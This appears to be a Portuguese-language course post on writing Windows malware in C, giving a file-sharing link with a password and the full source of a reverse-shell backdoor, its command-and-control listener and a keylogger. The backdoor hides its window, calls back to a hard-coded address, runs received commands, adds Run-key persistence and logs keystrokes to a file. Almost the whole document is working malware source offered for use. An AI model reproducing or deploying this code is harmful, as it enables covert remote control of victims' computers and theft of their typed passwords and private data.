Neste curso você aprenderá a desenvolver um Malware simples para Windows em linguagem C.
Link: https://dubox.com/s/1GAnUZK8usOSGRZ-jNV0Z5g
Senha: xrqf
Bem, este é o código-fonte completo
Server.c:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
int main()
{
int sock, client_socket;
char buffer[1024];
char response[18384];
struct sockaddr_in server_address, client_address;
int i=0;
int optval = 1;
socklen_t client_length;
sock = socket(AF_INET, SOCK_STREAM, 0);
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval)) < 0) {
printf("Error Setting TCP Socket Options!\n");
return 1;
}
server_address.sin_family = AF_INET;
server_address.sin_addr.s_addr = inet_addr("ip");
server_address.sin_port = htons(50005);
bind(sock, (struct sockaddr *) &server_address, sizeof(server_address));
listen(sock, 5);
client_length = sizeof(client_address);
client_socket = accept(sock, (struct sockaddr *) &client_address, &client_length);
while(1)
{
jump:
bzero(&buffer, sizeof(buffer));
bzero(&response, sizeof(response));
printf("* Shell#%s~$: ", inet_ntoa(client_address.sin_addr));
fgets(buffer, sizeof(buffer), stdin);
strtok(buffer, "\n");
write(client_socket, buffer, sizeof(buffer));
if (strncmp("q", buffer, 1) == 0) {
break;
}
else if (strncmp("cd ", buffer, 3) == 0) {
goto jump;
}
else if (strncmp("keylog_start", buffer, 12) == 0) {
goto jump;
}
else if (strncmp("persist", buffer, 7) == 0) {
recv(client_socket, response, sizeof(response), 0);
printf("%s", response);
}
else {
recv(client_socket, response, sizeof(response), MSG_WAITALL);
printf("%s", response);
}
}
}
Backdoor.c :
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include "keylogger.h"
#define bzero(p, size) (void) memset((p), 0, (size))
int sock;
int bootRun()
{
char err[128] = "Failed\n";
char suc[128] = "Created Persistence At : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n";
TCHAR szPath[MAX_PATH];
DWORD pathLen = 0;
pathLen = GetModuleFileName(NULL, szPath, MAX_PATH);
if (pathLen == 0) {
send(sock, err, sizeof(err), 0);
return -1;
}
HKEY NewVal;
if (RegOpenKey(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"), &NewVal) != ERROR_SUCCESS) {
send(sock, err, sizeof(err), 0);
return -1;
}
DWORD pathLenInBytes = pathLen * sizeof(*szPath);
if (RegSetValueEx(NewVal, TEXT("Hacked"), 0, REG_SZ, (LPBYTE)szPath, pathLenInBytes) != ERROR_SUCCESS) {
RegCloseKey(NewVal);
send(sock, err, sizeof(err), 0);
return -1;
}
RegCloseKey(NewVal);
send(sock, suc, sizeof(suc), 0);
return 0;
}
char *
str_cut(char str[], int slice_from, int slice_to)
{
if (str[0] == '\0')
return NULL;
char *buffer;
size_t str_len, buffer_len;
if (slice_to < 0 && slice_from > slice_to) {
str_len = strlen(str);
if (abs(slice_to) > str_len - 1)
return NULL;
if (abs(slice_from) > str_len)
slice_from = (-1) * str_len;
buffer_len = slice_to - slice_from;
str += (str_len + slice_from);
} else if (slice_from >= 0 && slice_to > slice_from) {
str_len = strlen(str);
if (slice_from > str_len - 1)
return NULL;
buffer_len = slice_to - slice_from;
str += slice_from;
} else
return NULL;
buffer = calloc(buffer_len, sizeof(char));
strncpy(buffer, str, buffer_len);
return buffer;
}
void Shell() {
char buffer[1024];
char container[1024];
char total_response[18384];
while (1) {
jump:
bzero(buffer,1024);
bzero(container, sizeof(container));
bzero(total_response, sizeof(total_response));
recv(sock, buffer, 1024, 0);
if (strncmp("q", buffer, 1) == 0) {
closesocket(sock);
WSACleanup();
exit(0);
}
else if (strncmp("cd ", buffer, 3) == 0) {
chdir(str_cut(buffer,3,100));
}
else if (strncmp("persist", buffer, 7) == 0) {
bootRun();
}
else if (strncmp("keylog_start", buffer, 12) == 0) {
HANDLE thread = CreateThread(NULL, 0,logg, NULL, 0, NULL);
goto jump;
}
else {
FILE *fp;
fp = _popen(buffer, "r");
while(fgets(container,1024,fp) != NULL) {
strcat(total_response, container);
}
send(sock, total_response, sizeof(total_response), 0);
fclose(fp);
}
}
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow){
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
struct sockaddr_in ServAddr;
unsigned short ServPort;
char *ServIP;
WSADATA wsaData;
ServIP = "192.168.1.6";
ServPort = 50005;
if (WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
exit(1);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&ServAddr, 0, sizeof(ServAddr));
ServAddr.sin_family = AF_INET;
ServAddr.sin_addr.s_addr = inet_addr(ServIP);
ServAddr.sin_port = htons(ServPort);
start:
while (connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0)
{
Sleep(10);
goto start;
}
MessageBox(NULL, TEXT("Your Device Has Been Hacked!!!"), TEXT("Windows Installer"), MB_OK | MB_ICONERROR);
Shell();
}
Arquivo de cabeçalho keylogger.h :
DWORD WINAPI logg(){
int vkey,last_key_state[0xFF];
int isCAPSLOCK,isNUMLOCK;
int isL_SHIFT,isR_SHIFT;
int isPressed;
char showKey;
char NUMCHAR[]=")!@#$%^&*(";
char chars_vn[]=";=,-./`";
char chars_vs[]=":+<_>?~";
char chars_va[]="[\\]\';";
char chars_vb[]="{|}\"";
FILE *kh;
char KEY_LOG_FILE[]="windows.txt";
//: making last key state 0
for(vkey=0;vkey<0xFF;vkey++){
last_key_state[vkey]=0;
}
//: running infinite
while(1){
//: take rest for 10 millisecond
Sleep(10);
//: get key state of CAPSLOCK,NUMLOCK
//: and LEFT_SHIFT/RIGHT_SHIFT
isCAPSLOCK=(GetKeyState(0x14)&0xFF)>0?1:0;
isNUMLOCK=(GetKeyState(0x90)&0xFF)>0?1:0;
isL_SHIFT=(GetKeyState(0xA0)&0xFF00)>0?1:0;
isR_SHIFT=(GetKeyState(0xA1)&0xFF00)>0?1:0;
//: cheking state of all virtual keys
for(vkey=0;vkey<0xFF;vkey++){
isPressed=(GetKeyState(vkey)&0xFF00)>0?1:0;
showKey=(char)vkey;
if(isPressed==1 && last_key_state[vkey]==0){
//: for alphabets
if(vkey>=0x41 && vkey<=0x5A){
if(isCAPSLOCK==0){
if(isL_SHIFT==0 && isR_SHIFT==0){
showKey=(char)(vkey+0x20);
}
}
else if(isL_SHIFT==1 || isR_SHIFT==1){
showKey=(char)(vkey+0x20);
}
}
//: for num chars
else if(vkey>=0x30 && vkey<=0x39){
if(isL_SHIFT==1 || isR_SHIFT==1){
showKey=NUMCHAR[vkey-0x30];
}
}
//: for right side numpad
else if(vkey>=0x60 && vkey<=0x69 && isNUMLOCK==1){
showKey=(char)(vkey-0x30);
}
//: for printable chars
else if(vkey>=0xBA && vkey<=0xC0){
if(isL_SHIFT==1 || isR_SHIFT==1){
showKey=chars_vs[vkey-0xBA];
}
else{
showKey=chars_vn[vkey-0xBA];
}
}
else if(vkey>=0xDB && vkey<=0xDF){
if(isL_SHIFT==1 || isR_SHIFT==1){
showKey=chars_vb[vkey-0xDB];
}
else{
showKey=chars_va[vkey-0xDB];
}
}
//: for right side chars ./*-+..
//: for chars like space,\n,enter etc..
//: for enter use newline char
//: don't print other keys
else if(vkey==0x0D){
showKey=(char)0x0A;
}
else if(vkey>=0x6A && vkey<=0x6F){
showKey=(char)(vkey-0x40);
}
else if(vkey!=0x20 && vkey!=0x09){
showKey=(char)0x00;
}
//:print_and_save_captured_key
if(showKey!=(char)0x00){
kh=fopen(KEY_LOG_FILE,"a");
putc(showKey,kh);
fclose(kh);
}
}
//: save last state of key
last_key_state[vkey]=isPressed;
}
}//;end_of_while_loop
}//;end_of_main_function